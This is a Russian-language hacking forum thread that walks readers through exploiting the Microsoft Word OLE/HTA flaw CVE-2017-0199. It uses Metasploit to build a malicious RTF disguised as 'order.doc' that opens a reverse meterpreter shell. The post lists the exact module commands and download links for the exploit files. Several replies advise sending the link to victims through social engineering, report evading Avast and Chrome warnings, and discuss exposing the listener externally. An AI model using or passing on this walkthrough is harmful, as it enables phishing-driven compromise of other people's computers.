Привет всем! В этой статье я хочу показать, как можно получить активную сессию meterpreter, на удаленном хосте (Windows 8.1., Windows 7, Windows Server 2008) используя скрипт python который генерирует .rtf-файл для атаки. Все необходимое включено в Metasploit Framework.

https://forum.antichat.xyz/attachmen...2af45444ed.png

Этот модуль создает вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.

OLE— технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.

OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.

Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.

Эта ошибка была изначально замечена в октябре 2016 года. Модуль был создан путем обращения вспять общедоступного образца вредоносной программы.

Начнем:

> use exploit/windows/fileformat/office_word_hta

> set srvhost 192.168.0.106

> set payload windows/meterpreter/reverse_tcp

> set filename order.doc

> set lhost 192.168.0.106

> exploit

https://forum.antichat.xyz/attachmen...7999c2e622.png


Выделенная ссылка, на скриншоте ниже должна быть доставлена целевой хост:

https://forum.antichat.xyz/attachmen...da30e63055.png

Переход по ней и открытие скачанного файла, откроет активную сессию meterpreter:

https://forum.antichat.xyz/attachmen...ff849693da.png

> sysinfo

https://forum.antichat.xyz/attachmen...fd5e8de6cc.png


На этом все, спасибо за внимание.

Уязвимость выстрелила как зеро-дэй. Речь шла о всех версиях. Так прошёл год )) Ждали от Майкрософта обновления с патчами.
11.04.2017 они действительно вышли и большей частью для МО 2016,2013,2010 г.
Но всё равно подозрительная тишина в отношении успеха.
Возможно ,пока к исчерпывающим ответам не готовы компании на рынке ИБ.
Кроме того, этого же числа , поддержка Win Vista должна быть прекращена по планам.
И это для поддерживаемых ОС,либо озадаченых обновлением пакета безопасности для МО.

да никто не кидает тапки)) ссылку доставь в контакте или еще как нить и убеди, что емц необходимо посмотреть этот документ)) короче изучай соц инженерию )

Вам надо воспользоваться поиском по форуму,задать теги meterpreter , metasploit .
Очень много отличных статей вышло от наших известных авторов.Быстро изучить не получится,т.к инструмент
огромен по функционалу. Ссылка, как вариант , прилагается к письму и отсылается с рассчётом на прочтение.

К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

качнуть код - под хайд

https://packetstormsecurity.com/files/142281/office_word_hta.rb.txt

Но это не все, что бы не получить ошибку:
Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf

качаем:
wget https://raw.githubusercontent.com/n...CVE-2017-0199/data/exploits/cve-2017-0199.rtf

стартуем, пробуем =)

ТС - респект за оперативный топик =)

Cпс ты как всегда спасаешь Parrot OS

Все работает

win7 SP1 Эннтерпрайз

отлично прошлось по виндовс 10 при работающем авасте )) но при скачивании гугл Хром ругаеться, что фаил может быть плохой и навредит компу))
[doublepost=1494623166,1494620336][/doublepost]добавлю ) после открытия файла на вин10 ) на панели висит непонятный значек, который напрягает и привлекает внимание)

А версия metasploit какая?

Стоит проапдейтить систему,

Совсем не верный подход, и не только с точки зрения закона. Что бы понимать алгоритм срабатывания, стоит поставить виртуалку, с разными вариантами версий Win и пакета SP, постаивть разные версии АВ и от разных производителей, браузеры разные, и только так, потому что будет наглядно видно поведение всей ситуации.

Коверканье названий вызывает личную неприязнь. На первый раз сдержался и не отправил в бан. Не уверен насчет второго раза.

.<---точка в переди названия файла означает что папка скрытая зайди в папку от рута (администратора) и увидишь ее тость курсор на папку правая кнопка мыши open with root

это понятно...))) что в кали все под рутом работают! тогда пробуй так из под терминала в папке рут: cp . TAB -2раза> затем cd .msf4 и cp zakaz180.doc /root/Desktop

Вы упустили пару моментов, читайте внимательно статью ТС-а

Не поиму почемуто то не видит эксплойт у меня. Все сделал как написано.

Он уже есть давно в комплекте msf (если система обновлена), можно не качать.
Если не видит, значит где то ошибка - проверяем пути ( У СЕБЯ СВОИ ПУТИ, НАЗВАНИЕ ПАПОК )

Блин не заводиться у меня этот эксплойт. Он же должен запускать апачь?

Подробнее про проблему, а скрины увеличат шанс решения ситуации =) Мб не верно по готовой ссылке идет переход?

Хорошая статья, то что нужно для учебного фишинга

Чисто затестить лучше потренируйся в локалке) а так он тебе говорит что не может запустить листенер на этом айпи)
Для теста на внешку тебе и динамического будет достаточно.

С внешкой в тестовом режиме я делал как.
1 - пробрасывал порт на роутере
2 - хандлер в метасплоите указывал локальный ip
3 - генерировал нагрузку через Veil на внешний адрес. Может это и через метасплоит можно делать, но я пока не углублялся в него прям сильно) он у меня только слушает подключения и используется, в основном, для пост эксплуатации) ибо такое кол-во модулей не так быстро поддаются изучению

Если сомневаешься, правильно ли всё сделал, то можешь попробовать самое примитивное: это открыть 80 порт, запустить апач, пробросить 80 порт, и проверить с 4G с телефона открыть страницу) если откроется, значит все делал правильно.
Ибо сканеры, сканерами, а когда воочию увидишь запущенный на внешку веб сервер то оцениваешь это по другому)

Пробивается и windows 10 и vm windows 7

https://forum.antichat.xyz/attachmen...395b48c965.png

какой fud?

и не заработает)) Такая инфа Бро лежит под лютым хайдом каждый матерый знает как это сделать, но никто хочет и не будет выкладывать все в паблик.. простой способ покупай себе VPS с внешним IP и будет тебе счастье..)

не в коем случае не тролю никого я из этого вырос, хотя могу! Указываешь, а толку если инет его не видит, как сам видишь по портам..

Протестировал в термуксе,сессия прилетела ,нод не отреагировал, хром тоже спокойно файлу дал загрузится)